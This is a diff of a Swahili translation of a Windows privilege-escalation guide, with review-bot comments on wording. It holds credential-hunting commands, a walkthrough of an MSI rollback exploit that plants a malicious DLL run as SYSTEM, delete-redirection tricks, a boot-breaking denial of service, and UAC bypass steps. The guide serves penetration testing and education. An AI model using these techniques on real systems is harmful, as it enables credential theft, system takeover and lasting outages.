**HKEY\CLASSES\ROOT\Interface** mtawalia. Registry hii imeundwa kwa kuunganisha **HKEY\LOCAL\MACHINE\Software\Classes** + **HKEY\CURRENT\USER\Software\Classes** = **HKEY\CLASSES\ROOT.** -Ndani ya CLSIDs za registry hii unaweza kupata registry ndogo **InProcServer32** ambayo ina thamani ya default inayorejea kwenye **DLL** na thamani iitwayo **ThreadingModel** ambayo inaweza kuwa **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) au **Neutral** (Thread Neutral). 
+Ndani ya CLSIDs za registry hii unaweza kupata registry mdogo **InProcServer32** ambayo ina **default value** inayomaanisha kwa **DLL** na value inayoitwa **ThreadingModel** ambayo inaweza kuwa **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) au **Neutral** (Thread Neutral). ![](<../../images/image (729).png>) -Kwa msingi, ikiwa unaweza kuandika upya (overwrite) DLL yoyote itakayotekelezwa, unaweza escalate privileges ikiwa DLL hiyo itatekelezwa na mtumiaji tofauti. +Kwa msingi, ikiwa unaweza **overwrite any of the DLLs** ambazo zitatekelezwa, unaweza **kupandisha ruhusa** ikiwa DLL hiyo itatekelezwa na mtumiaji tofauti. -Ili kujifunza jinsi watapeli wanavyotumia COM Hijacking kama mbinu ya kudumu angalia: +To learn how attackers use COM Hijacking as a persistence mechanism check: {{#ref}} com-hijacking.md {{#endref}} -### **Utafutaji wa nywila kwa ujumla katika faili na registry** +### **Generic Password search in files and registry** -**Tafuta yaliyomo kwenye faili** +**Tafuta maudhui ya faili** ```bash cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt findstr /si password *.xml *.ini *.txt *.config findstr /spin "password" *.* ``` -**Tafuta faili lenye jina fulani** +**Tafuta faili yenye jina maalum** ```bash dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* where /R C:\ user.txt where /R C:\ *.ini ``` -**Tafuta kwenye rejista majina ya funguo na nywila** +**Tafuta katika registry kwa key names na passwords** ```bash REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K 
@@ -1255,11 +1249,11 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /d ``` ### Zana zinazotafuta passwords -[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **is a msf** plugin. Nimeunda plugin hii ili **automatically execute every metasploit POST module that searches for credentials** ndani ya victim.\ -[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) inatafuta kiotomatiki faili zote zenye passwords zilizotajwa kwenye ukurasa huu.\ -[**Lazagne**](https://github.com/AlessandroZ/LaZagne) ni zana nyingine nzuri ya kutoa password kutoka kwenye mfumo. +[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **is a msf** plugin. Niliunda plugin hii ili **automatically execute every metasploit POST module that searches for credentials** ndani ya victim.\ +[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) inatafuta moja kwa moja faili zote zenye passwords zilizotajwa kwenye ukurasa huu.\ +[**Lazagne**](https://github.com/AlessandroZ/LaZagne) ni zana nyingine nzuri ya kuchota passwords kutoka kwa mfumo. -Zana [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) inatafuta **sessions**, **usernames** na **passwords** za zana kadhaa ambazo zinaweka data hii kwa maandishi wazi (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP) +Zana [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) inatafuta **sessions**, **usernames** na **passwords** za zana kadhaa zinazohifadhi data hii kwa clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP) ```bash Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -Thorough 
@@ -1268,30 +1262,30 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ``` ## Leaked Handlers -Imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **ufikiaji kamili**. The same process **also create a new process** (`CreateProcess()`) **ikiwa na ruhusa za chini lakini ikirithi handles zote zilizofunguliwa za mchakato mkuu**.\ -Then, if you have **ufikiaji kamili kwenye mchakato wenye ruhusa za chini**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.\ +Fikiria kwamba **mchakato unaoendeshwa kama SYSTEM unafungua mchakato mpya** (`OpenProcess()`) kwa **ufikiaji kamili**. Mchakato huo huo **pia huunda mchakato mpya** (`CreateProcess()`) **kwa idhini za chini lakini ukirithi handles zote zilizo wazi za mchakato mkuu**.\ +Kisha, ikiwa una **ufikiaji kamili kwa mchakato mwenye idhini za chini**, unaweza kuchukua **open handle ya mchakato mwenye idhini iliyoundwa** na `OpenProcess()` na **kuchoma shellcode**.\ [Read this example for more information about **how to detect and exploit this vulnerability**.](leaked-handle-exploitation.md)\ [Read this **other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access)**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/). ## Named Pipe Client Impersonation -Shared memory segments, referred to as **pipes**, enable process communication and data transfer. +Shared memory segments, zinazojulikana kama **pipes**, zinawezesha mawasiliano ya mchakato na uhamishaji wa data. -Windows provides a feature called **Named Pipes**, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as **named pipe server** and **named pipe client**. 
+Windows inatoa kipengele kinachoitwa **Named Pipes**, kuruhusu michakato isiyohusiana kushiriki data, hata kupitia mitandao tofauti. Hii inafanana na usanifu wa client/server, na majukumu yamefafanuliwa kama **named pipe server** na **named pipe client**. -When data is sent through a pipe by a **client**, the **server** that set up the pipe has the ability to **take on the identity** of the **client**, assuming it has the necessary **SeImpersonate** rights. Identifying a **mchakato mwenye ruhusa za juu** that communicates via a pipe you can mimic provides an opportunity to **pata ruhusa za juu** by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found [**here**](named-pipe-client-impersonation.md) and [**here**](#from-high-integrity-to-system). +Wakati data inapotumwa kupitia pipe na **client**, **server** iliyoweka pipe ina uwezo wa **kuchukua utambulisho** wa **client**, ikizingatia kuwa ina haki zinazohitajika za **SeImpersonate**. Kutambua **mchakato mwenye idhini** unaozungumza kupitia pipe ambayo unaweza kuiga kunatoa fursa ya **kupata ruhusa za juu** kwa kuchukua utambulisho wa mchakato huo mara tu unapoingiliana na pipe uliyoanzisha. Kwa maagizo juu ya jinsi ya kufanya shambulio kama hilo, mwongozo wenye msaada unaweza kupatikana [**here**](named-pipe-client-impersonation.md) na [**here**](#from-high-integrity-to-system). 
-Also the following tool allows to **intercept a named pipe communication with a tool like burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **and this tool allows to list and see all the pipes to find privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer) +Pia zana zifuatazo zinakuwezesha **kuingilia mawasiliano ya named pipe kwa zana kama burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **na zana hii inaruhusu kuorodhesha na kuona pipes zote ili kupata privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer) -## Misc +## Mengine ### File Extensions that could execute stuff in Windows -Check out the page **[https://filesec.io/](https://filesec.io/)** +Angalia ukurasa **[https://filesec.io/](https://filesec.io/)** ### **Monitoring Command Lines for passwords** -When getting a shell as a user, there may be scheduled tasks or other processes being executed which **pass credentials on the command line**. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences. +Unapopata shell kama mtumiaji, kunaweza kuwa na kazi zilizopangwa au michakato mingine inayotekelezwa ambayo **inapitisha leseni kwenye mstari wa amri**. Skripti hapa chini inakamata mistari ya amri ya michakato kila sekunde mbili na inalinganisha hali ya sasa na hali iliyopita, ikitoa tofauti yoyote. ```bash while($true) { 
@@ -1303,11 +1297,11 @@ Compare-Object -ReferenceObject $process -DifferenceObject $process2 ``` ## Kuiba nywila kutoka kwa michakato -## From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass +## Kutoka Mtumiaji wa Vibali Vidogo hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass -Ikiwa una ufikiaji wa kiolesura cha picha (via console or RDP) na UAC imewezeshwa, katika matoleo kadhaa ya Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na ruhusa. +Ikiwa una upatikanaji wa kiolesura cha picha (kupitia console au RDP) na UAC imewezeshwa, katika baadhi ya matoleo ya Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na vibali. -Hii inafanya iwezekane kuongeza viwango vya ruhusa na bypass UAC kwa wakati mmoja kwa kutumia udhaifu huo. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato, imewekwa saini na kutolewa na Microsoft. +Hii inafanya iwezekane kufanya escalate privileges na bypass UAC kwa wakati mmoja kwa udhaifu uleule. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato imesainiwa na kutolewa na Microsoft. Baadhi ya mifumo iliyoathiriwa ni zifuatazo: ``` @@ -1331,7 +1325,7 @@ Windows 10 1607 14393 ** link OPENED AS SYSTEM ** Windows 10 1703 15063 link NOT opened Windows 10 1709 16299 link NOT opened ``` -Ili kutumia udhaifu huu, ni lazima ufanye hatua zifuatazo: +Ili kutumia udhaifu huu, ni lazima utekeleze hatua zifuatazo: ``` 1) Right click on the HHUPD.EXE file and run it as Administrator. 
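Review bot: the retranslated heading and first paragraph of the CVE-2019-1388 hunk keep "NT\AUTHORITY SYSTEM", which is not a Windows account name; the new page added in this same diff writes it correctly as `NT AUTHORITY\SYSTEM` ("ikitekeleza nambari yoyote kama NT AUTHORITY\SYSTEM"), so fix both occurrences here while the lines are being touched. "kufanya escalate privileges na bypass UAC" mixes languages where "kupandisha vibali" (the phrase used in the Named Pipes section further down, "kupandisha kiwango") would be consistent. The rest of the wording changes ("upatikanaji wa kiolesura cha picha", "baadhi ya matoleo", "udhaifu uleule", "utekeleze hatua zifuatazo") read fine.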
@@ -1353,199 +1347,199 @@ You have all the necessary files and information in the following GitHub reposit https://github.com/jas502n/CVE-2019-1388 -## Kutoka Administrator Medium hadi High Integrity Level / UAC Bypass +## Kutoka kwa Administrator Medium hadi High Integrity Level / UAC Bypass -Soma hii ili ujifunze kuhusu Integrity Levels: +Soma hili ili **ujifunze kuhusu Integrity Levels**: {{#ref}} integrity-levels.md {{#endref}} -Kisha soma hii ili ujifunze kuhusu UAC na UAC bypasses: +Kisha **soma hili ili ujifunze kuhusu UAC na UAC bypasses:** {{#ref}} ../authentication-credentials-uac-and-efs/uac-user-account-control.md {{#endref}} -## Kutoka Arbitrary Folder Delete/Move/Rename hadi SYSTEM EoP +## Kutoka kwenye Futa/Kuhamisha/Kubadilisha Jina la Folda yoyote hadi SYSTEM EoP -Mbinu iliyotajwa [**katika chapisho hili la blogu**](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) pamoja na exploit code [**inapatikana hapa**](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs). +Mbinu iliyofafanuliwa [**in this blog post**](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) pamoja na msimbo wa exploit [**available here**](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs). -Shambulio linaanzia kwa kutumia kipengele cha rollback cha Windows Installer kubadilisha faili halali na zile zenye madhara wakati wa mchakato wa uninstall. Kwa hili mshambuliaji anahitaji kuunda MSI installer yenye madhara itakayotumika kupora folda ya `C:\Config.Msi`, ambayo baadaye Windows Installer itatumia kuhifadhi faili za rollback wakati wa uninstall ya vifurushi vingine vya MSI ambapo faili za rollback zingeweza kuharibiwa ili zijawe na payload ya madhara. +Shambulio linajumuisha kutumia kipengele cha rollback cha Windows Installer kubadilisha faili halali kwa zile za uhasama wakati wa mchakato wa uninstall. 
Kwa hili mshambuliaji anahitaji kuunda **malicious MSI installer** itakayotumika kujiiba folda `C:\Config.Msi`, ambayo baadaye itatumika na Windows Installer kuhifadhi faili za rollback wakati wa kuondolewa kwa vifurushi vingine vya MSI ambapo faili za rollback zingeweza kurekebishwa ili kuwa na payload hasidi. -Mbinu kwa ufupisho ni kama ifuatavyo: +Mbinu iliyofupishwa ni ifuatayo: -1. **Hatua 1 – Preparing for the Hijack (acha `C:\Config.Msi` tupu)** +1. **Hatua ya 1 – Kujiandaa kwa Hijack (acha `C:\Config.Msi` tupu)** -- Hatua 1: Install the MSI -- Tengeneza `.msi` inayosakinisha faili isiyo hatari (mfano, `dummy.txt`) katika folda inayoweza kuandikwa (`TARGETDIR`). -- Taja installer kama **"UAC Compliant"**, ili **mtumiaji asiye-admin** aweze kuendesha. -- Weka **handle** wazi kwa faili baada ya usakinishaji. +- Hatua 1: Sakinisha MSI +- Tengeneza `.msi` inayosakinisha faili lisilo hatari (mfano, `dummy.txt`) katika folda inayoweza kuandikwa (`TARGETDIR`). +- Chagua installer kama **"UAC Compliant"**, ili **mtumiaji asiye admin** aweze kuiendesha. +- Weka **handle** wazi kwa faili baada ya kusakinisha. -- Hatua 2: Begin Uninstall -- Uninstall `.msi` hiyo hiyo. -- Mchakato wa uninstall unaanza kuhamisha faili kwenda `C:\Config.Msi` na kuzipa majina ya `.rbf` (rollback backups). -- **Polling ya handle ya faili iliyo wazi** kwa kutumia `GetFinalPathNameByHandle` ili kugundua wakati faili inabadilika kuwa `C:\Config.Msi\.rbf`. +- Hatua 2: Anza Uninstall +- Uninstall `.msi` ile ile. +- Mchakato wa uninstall unaanza kuhamisha faili kwenda `C:\Config.Msi` na kuziacha majina kuwa `.rbf` files (rollback backups). +- **Endelea kuchunguza handle ya faili iliyo wazi** ukitumia `GetFinalPathNameByHandle` ili kugundua wakati faili inakuwa `C:\Config.Msi\.rbf`. -- Hatua 3: Custom Syncing +- Hatua 3: Syncing Maalum - `.msi` ina **custom uninstall action (`SyncOnRbfWritten`)** ambayo: -- Inatoa ishara wakati `.rbf` imeandikwa. 
-- Kisha **inasubiri** tukio lingine kabla ya kuendelea na uninstall. +- Inaashiria wakati `.rbf` imeandikwa. +- Kisha **inasubiri** tukio jingine kabla ya kuendelea na uninstall. -- Hatua 4: Block Deletion of `.rbf` -- Unapopokea ishara, **ufungue faili ya `.rbf`** bila `FILE_SHARE_DELETE` — hili **linazuia ifutwe**. -- Kisha **rudisha ishara** ili uninstall iendelee. -- Windows Installer haitafanikiwa kufuta `.rbf`, na kwa sababu haiwezi kufuta maudhui yote, **`C:\Config.Msi` hairudishwi**. +- Hatua 4: Zuia Kufutwa kwa `.rbf` +- Ukitumwa ishara, **fungua faili ya `.rbf`** bila `FILE_SHARE_DELETE` — hii **inazuia kufutwa kwake**. +- Kisha **tuma ishara nyuma** ili uninstall iishe. +- Windows Installer haifanyi kufuta `.rbf`, na kwa sababu haiwezi kufuta yaliyomo yote, **`C:\Config.Msi` haisiondolewa**. -- Hatua 5: Manually Delete `.rbf` -- Wewe (mshambuliaji) unafuta `.rbf` kwa mikono. -- Sasa **`C:\Config.Msi` iko tupu**, tayari kuporwa. +- Hatua 5: Futa `.rbf` kwa mkono +- Wewe (mshambuliaji) unafuta faili `.rbf` kwa mkono. +- Sasa **`C:\Config.Msi` ni tupu**, tayari kuibiwa. -> Katika hatua hii, chochea udhaifu wa SYSTEM-level wa kufuta folda kiholela ili kufuta `C:\Config.Msi`. +> Katika kipindi hiki, **anzisha hitilafu ya kufuta folda isiyochaguliwa kwa ngazi ya SYSTEM** kufuta `C:\Config.Msi`. -2. **Hatua 2 – Replacing Rollback Scripts with Malicious Ones** +2. **Hatua ya 2 – Kubadilisha Rollback Scripts na Zenye Uhalifu** -- Hatua 6: Recreate `C:\Config.Msi` with Weak ACLs -- Unda tena folda ya `C:\Config.Msi` mwenyewe. -- Weka **DACLs dhaifu** (mfano, Everyone:F), na **weka handle wazi** ukiwa na `WRITE_DAC`. +- Hatua 6: Unda tena `C:\Config.Msi` na ACL dhaifu +- Unda tena folda `C:\Config.Msi` mwenyewe. +- Weka **DACLs dhaifu** (mfano, Everyone:F), na **weka handle wazi** na `WRITE_DAC`. -- Hatua 7: Run Another Install -- Sakinisha `.msi` tena, ambapo: -- `TARGETDIR`: Mahali pa kuandikwa. -- `ERROROUT`: Kigezo kinachochochea kushindwa kwa lazima. 
-- Usakinishaji huu utatumika kuchochea **rollback** tena, ambayo inasoma `.rbs` na `.rbf`. +- Hatua 7: Endesha Install nyingine +- Sakinisha `.msi` tena, ukiwa na: +- `TARGETDIR`: Mahali pa kuandika. +- `ERROROUT`: Kigezo kinachosababisha kushindwa kwa lazima. +- Install hii itatumika kusababisha **rollback** tena, ambayo inasoma `.rbs` na `.rbf`. -- Hatua 8: Monitor for `.rbs` -- Tumia `ReadDirectoryChangesW` kufuatilia `C:\Config.Msi` hadi `.rbs` mpya itaonekana. -- Rekodi jina lake. +- Hatua 8: Chunguza kwa `.rbs` +- Tumia `ReadDirectoryChangesW` kuchunguza `C:\Config.Msi` hadi `.rbs` mpya itaonekana. +- Chukua jina la faili yake. -- Hatua 9: Sync Before Rollback +- Hatua 9: Sync Kabla ya Rollback - `.msi` ina **custom install action (`SyncBeforeRollback`)** ambayo: -- Inatoa ishara tukio linapotengenezwa `.rbs`. +- Inaashiria tukio wakati `.rbs` imeundwa. - Kisha **inasubiri** kabla ya kuendelea. -- Hatua 10: Reapply Weak ACL -- Baada ya kupokea tukio la `.rbs created`: -- Windows Installer **inarudisha ACL kali** kwa `C:\Config.Msi`. -- Lakini kwa kuwa bado una handle yenye `WRITE_DAC`, unaweza **kurudisha ACL dhaifu** tena. +- Hatua 10: Tumia tena ACL dhaifu +- Baada ya kupokea tukio la ` .rbs created`: +- Windows Installer **inatumia tena ACL kali** kwa `C:\Config.Msi`. +- Lakini kwa kuwa bado una handle na `WRITE_DAC`, unaweza **tumia tena ACL dhaifu** tena. -> ACLs zinatekelezwa **tu wakati handle inafunguliwa**, hivyo bado unaweza kuandika kwenye folda. +> ACLs zinafanywa **tu wakati handle imefunguliwa**, hivyo bado unaweza kuandika kwenye folda. -- Hatua 11: Drop Fake `.rbs` and `.rbf` -- Ibiyesi faili ya `.rbs` na **script ya rollback feki** ambayo inaelekeza Windows: -- Kurudisha `.rbf` yako (DLL yenye madhara) katika eneo lenye mamlaka (mfano, `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`). -- Angusha `.rbf` yako ya uongo yenye **DLL yenye payload ya SYSTEM**. 
+- Hatua 11: Weka `.rbs` na `.rbf` feki +- Bandikisha juu ya faili `.rbs` na **rollback script feki** inayowaambia Windows ili: +- Rejesha faili yako `.rbf` (DLL hasidi) katika **mahali lenye vipaumbele** (mfano, `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`). +- Weka `.rbf` yako feki inayojumuisha **DLL ya payload hasidi ya ngazi ya SYSTEM**. -- Hatua 12: Trigger the Rollback -- Toa ishara ya sync ili installer iendelee. -- Custom action ya aina 19 (`ErrorOut`) imeandaliwa kusababisha usakinishaji kushindwa kwa makusudi mahali maalum. -- Hii inasababisha **rollback kuanza**. +- Hatua 12: Sababisha Rollback +- Tuma ishara ya sync ili installer iendelee. +- Kitendo maalum cha aina 19 (`ErrorOut`) kimepangwa ili **kufanya kusababisha kushindwa kwa kusakinisha kwa hiari** mahali panapojulikana. +- Hii husababisha **rollback kuanza**. -- Hatua 13: SYSTEM Installs Your DLL +- Hatua 13: SYSTEM Inasakinisha DLL Yako - Windows Installer: -- Inasoma `.rbs` yako yenye madhara. -- Inakopia `.rbf` DLL yako hadi eneo la lengo. -- Sasa una **DLL yako yenye madhara katika njia inayopakiwa na SYSTEM**. +- Inasoma `.rbs` yako hasidi. +- Inanakili DLL yako ya `.rbf` katika eneo lengwa. +- Sasa una **DLL yako hasidi katika njia inayopakiwa na SYSTEM**. -- Hatua ya Mwisho: Execute SYSTEM Code -- Endesha binary iliyotambulika na auto-elevated (mfano, `osk.exe`) ambayo inaload DLL uliyepora. +- Hatua ya Mwisho: Endesha msimbo wa SYSTEM +- Endesha binary unaoaminika wa **auto-elevated** (mfano, `osk.exe`) unaochukua DLL uliyoiiba. - **Boom**: Msimbo wako unatekelezwa **kama SYSTEM**. -### Kutoka Arbitrary File Delete/Move/Rename hadi SYSTEM EoP +### Kutoka Futa/Hamisha/Badilisha Jina la Faili Yenyewe hadi SYSTEM EoP -Mbinu kuu ya MSI rollback (ile ya hapo juu) inadhani unaweza kufuta **folda nzima** (mfano, `C:\Config.Msi`). Lakini vipi ikiwa udhaifu wako unaruhusu tu **kufuta faili kiholela**? 
+Mbinu kuu ya MSI rollback (ileo hapo juu) inaeleza kuwa unaweza kufuta **folda nzima** (mfano, `C:\Config.Msi`). Lakini vipi ikiwa udhaifu wako unaruhusu tu **kufuta faili yoyote** ? -Unaweza kutumia mambo ya ndani ya NTFS: kila folda ina hidden alternate data stream inayoitwa: +Unaweza kutumia **NTFS internals**: kila folda ina hidden alternate data stream called: ``` C:\SomeFolder::$INDEX_ALLOCATION ``` Mtiririko huu unahifadhi **metadata ya index** ya folda. -Kwa hivyo, ukifuta **stream ya `::$INDEX_ALLOCATION`** ya folda, NTFS **huondoa folda nzima** kutoka kwenye filesystem. +Hivyo, ikiwa **utafuta mtiririko `::$INDEX_ALLOCATION`** wa folda, NTFS **itaondoa folda nzima** kutoka kwenye mfumo wa faili. Unaweza kufanya hivyo kwa kutumia API za kawaida za kufuta faili kama: ```c DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION"); ``` -> Ingawa unaitisha API ya kufuta *file*, inafuta **folder yenyewe**. +> Ingawa unaitisha API ya kufuta *file*, **inafuta folder yenyewe**. ### Kutoka Folder Contents Delete hadi SYSTEM EoP -Je, vipi ikiwa primitive yako hairuhusi kufuta arbitrary files/folders, lakini inaruhusu **kufutwa kwa *contents* ya attacker-controlled folder**? +Je, primitive yako hairuhusu kufuta files/folders yoyote, lakini **inaruhusu kufuta *contents* za attacker-controlled folder**? -1. Hatua 1: Tayarisha folder na file la mtego +1. Step 1: Andaa bait folder na file - Create: `C:\temp\folder1` - Inside it: `C:\temp\folder1\file1.txt` -2. Hatua 2: Weka **oplock** kwenye `file1.txt` -- Oplock **inasitisha utekelezaji** wakati mchakato wenye vibali unajaribu kufuta `file1.txt`. +2. Step 2: Weka **oplock** kwenye `file1.txt` +- Oplock **inasitisha utekelezaji** wakati mchakato mwenye ruhusa anajaribu kufuta `file1.txt`. ```c // pseudo-code RequestOplock("C:\\temp\\folder1\\file1.txt"); WaitForDeleteToTriggerOplock(); ``` -3. 
Hatua 3: Chochea mchakato wa SYSTEM (mfano, `SilentCleanup`) -- Mchakato huu hupitia folda (mfano, `%TEMP%`) na kujaribu kufuta yaliyomo ndani yao. -- Inapofika kwenye `file1.txt`, **oplock triggers** na inakabidhi udhibiti kwa callback yako. +3. Hatua 3: Sababisha mchakato wa SYSTEM (mfano, `SilentCleanup`) +- Mchakato huu unachambua folda (mfano, `%TEMP%`) na unajaribu kufuta yaliyomo ndani yake. +- Inapofika kwenye `file1.txt`, **oplock triggers** na inatoa udhibiti kwa callback yako. -4. Hatua 4: Ndani ya oplock callback – elekeza kufutwa +4. Hatua 4: Ndani ya callback ya oplock – elekeza tena ufutaji - Chaguo A: Hamisha `file1.txt` mahali pengine -- Hii itafanya `folder1` kuwa tupu bila kuvunja oplock. -- Usifute `file1.txt` moja kwa moja — hilo litaachilia oplock mapema. +- Hili huifanya `folder1` kuwa tupu bila kuvunja oplock. +- Usifute `file1.txt` moja kwa moja — hiyo itaachilia oplock mapema. - Chaguo B: Geuza `folder1` kuwa **junction**: ```bash # folder1 is now a junction to \RPC Control (non-filesystem namespace) mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control ``` -- Chaguo C: Tengeneza **symlink** katika `\RPC Control`: +- Chaguo C: Unda **symlink** katika `\RPC Control`: ```bash # Make file1.txt point to a sensitive folder stream CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION") ``` -> Hii inalenga mtiririko wa ndani wa NTFS unaohifadhi metadata ya folda — kuifuta kunafuta folda. +> Hii inalenga mtiririko wa ndani wa NTFS unaohifadhi metadata ya folda — kuifuta inafuta folda. -5. Hatua ya 5: Kuachilia oplock -- Mchakato wa SYSTEM unaendelea na kujaribu kufuta `file1.txt`. -- Lakini sasa, kutokana na junction + symlink, kwa kweli inafanya kufuta: +5. Hatua ya 5: Achilia oplock +- Mchakato wa SYSTEM unaendelea na unajaribu kufuta `file1.txt`. +- Lakini sasa, kutokana na junction + symlink, kwa kweli inafuta: ``` C:\Config.Msi::$INDEX_ALLOCATION ``` -**Matokeo**: `C:\Config.Msi` is deleted by SYSTEM. 
+**Matokeo**: `C:\Config.Msi` imefutwa na SYSTEM. -### Kutoka Arbitrary Folder Create hadi Permanent DoS +### Kutoka Kuunda Folda ya Nasibu hadi DoS ya Kudumu -Tumia primitive inayokuwezesha **create an arbitrary folder as SYSTEM/admin** — hata kama **huwezi kuandika faili** au **kuweka ruhusa dhaifu**. +Tumia primitive inayoikuruhusu **kuunda folda yoyote kama SYSTEM/admin** — hata kama **hautiwezi kuandika faili** au **kusanidi ruhusa dhaifu**. -Unda **kabrasha** (sio faili) lenye jina la **driver muhimu wa Windows**, mfano: +Unda **folda** (sio faili) yenye jina la **dereva muhimu wa Windows**, kwa mfano: ``` C:\Windows\System32\cng.sys ``` - Njia hii kwa kawaida inalingana na driver ya kernel-mode `cng.sys`. -- Ikiwa utaifanya awali kama folda, Windows itashindwa kupakia driver halisi wakati wa boot. +- Ikiwa **utaiunda mapema kama folda**, Windows inashindwa kupakia driver halisi wakati wa boot. - Kisha, Windows inajaribu kupakia `cng.sys` wakati wa boot. -- Inapoiona folda, **inashindwa kutatua driver halisi**, na **inaanguka au kusimamisha boot**. -- Hakuna **njia mbadala**, na hakuna **urejeshaji** bila uingiliaji wa nje (kwa mfano, marekebisho ya boot au ufikiaji wa diski). +- Inaiona folda, **inashindwa kutatua driver halisi**, na **inasababisha crash au kusimamisha boot**. +- Hakuna **njia mbadala**, na hakuna **urejesho** bila uingiliaji wa nje (kwa mfano, ukarabati wa boot au ufikiaji wa diski). 
## **Kutoka High Integrity hadi System** ### **Huduma mpya** -Ikiwa tayari unatekeleza mchakato wa High Integrity, **njia hadi SYSTEM** inaweza kuwa rahisi kwa tu **kuunda na kutekeleza service mpya**: +Ikiwa tayari unafanya kazi kwenye mchakato wa High Integrity, **njia ya kupata SYSTEM** inaweza kuwa rahisi kwa **kuunda na kutekeleza service mpya**: ``` sc create newservicename binPath= "C:\windows\system32\notepad.exe" sc start newservicename ``` > [!TIP] -> Wakati unaunda service binary hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka — itauawa ndani ya 20s ikiwa si service halali. +> Wakati wa kuunda service binary hakikisha ni service halali au kwamba binary inatekeleza vitendo vinavyohitajika haraka kwani itauawa ndani ya 20s ikiwa sio service halali. ### AlwaysInstallElevated -Kutoka kwenye High Integrity process unaweza kujaribu ku-enable the AlwaysInstallElevated registry entries na install reverse shell ukitumia _**.msi**_ wrapper.\ +Kutoka kwa High Integrity process unaweza kujaribu **kuwezesha AlwaysInstallElevated registry entries** na **kufunga** reverse shell kwa kutumia _**.msi**_ wrapper.\ [More information about the registry keys involved and how to install a _.msi_ package here.](#alwaysinstallelevated) ### High + SeImpersonate privilege to System 
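Review bot: two places in this hunk change the meaning of the MSI rollback walkthrough. Step 4 now says "Kisha **tuma ishara nyuma** ili uninstall iishe" (so the uninstall finishes), but the point is that the uninstall continues after the signal; the removed line "ili uninstall iendelee" was correct. The "Arbitrary File" subsection now opens "Mbinu kuu ya MSI rollback (ileo hapo juu) inaeleza kuwa unaweza kufuta folda nzima", i.e. "explains that", whereas the technique assumes ("inadhani", as in the removed line) a folder-delete primitive, which is exactly why a file-delete-only variant is needed; "ileo" is also a typo for "ile". In the same step 4, "Windows Installer haifanyi kufuta `.rbf`" and "`C:\Config.Msi` haisiondolewa" are not grammatical; "inashindwa kufuta" and "haiondolewi" are meant. Translation slips that invert or blur the security point: "hitilafu ya kufuta folda isiyochaguliwa" means an unselected folder, not an arbitrary one (use "folda yoyote", as the heading "Futa/Kuhamisha/Kubadilisha Jina la Folda yoyote" already does); the subsection heading "Futa/Hamisha/Badilisha Jina la Faili Yenyewe" means "the file itself" and should parallel the folder heading as "Faili yoyote"; step 12 "kushindwa kwa kusakinisha kwa hiari" means voluntarily, the removed line's "kwa makusudi" (intentionally) was right; "Zenye Uhalifu" (criminal) for malicious rollback scripts clashes with "hasidi", the word used for the DLL and payload everywhere else in the hunk. Typos introduced by the rewrite: "inayoikuruhusu" (inayokuruhusu), "hautiwezi kuandika" (huwezi kuandika, as before). In the permanent-DoS subsection "dereva muhimu wa Windows" is followed two lines later by "driver halisi"; pick one term. In the AlwaysInstallElevated paragraph "**kufunga** reverse shell" means close or lock; "kusakinisha" (install) is used for MSI installs elsewhere on this page. Finally, the outer "Hatua ya 1 / Hatua ya 2" and inner "Hatua 1 ... Hatua 13" both translate as "Step"; "Awamu ya 1 / Awamu ya 2" for the two phases removes the collision.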
